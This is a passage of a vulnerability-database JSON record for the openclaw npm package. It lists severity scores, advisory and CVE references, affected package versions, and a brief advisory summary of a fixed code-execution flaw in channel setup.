                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/355abe5eba28012e6a95b9923a32831fcf870344",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/355abe5eba28012e6a95b9923a32831fcf870344"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:44Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41303",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41303"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-discord-text-approval-commands",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:44Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-discord-text-approval-commands"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-98hh-7ghg-x6rq",
                    "reference_id": "GHSA-98hh-7ghg-x6rq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-98hh-7ghg-x6rq"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41303",
                "GHSA-98hh-7ghg-x6rq"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u9cw-crg5-1kbs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89510?format=api",
            "vulnerability_id": "VCID-una1-gxkk-t3bp",
            "summary": "OpenClaw: Untrusted workspace channel shadows could execute during built-in channel setup\n## Summary\n\nBefore OpenClaw 2026.4.2, built-in channel setup and login could resolve an untrusted workspace channel shadow before the plugin was explicitly trusted. A malicious workspace plugin that claimed a bundled channel id could execute during channel setup even while still disabled.\n\n## Impact\n\nA cloned workspace could turn channel setup for a built-in channel into unintended in-process code execution from an untrusted workspace plugin. This bypassed the intended workspace-plugin trust boundary during setup and login.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0` — ignore untrusted workspace channel shadows during setup resolution\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41295",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03582",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03589",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03575",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41295"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2qrv-rc5x-2g2h",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2qrv-rc5x-2g2h"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41295",
                    "reference_id": "CVE-2026-41295",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41295"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2qrv-rc5x-2g2h",
                    "reference_id": "GHSA-2qrv-rc5x-2g2h",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2qrv-rc5x-2g2h"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup",
                    "reference_id": "openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
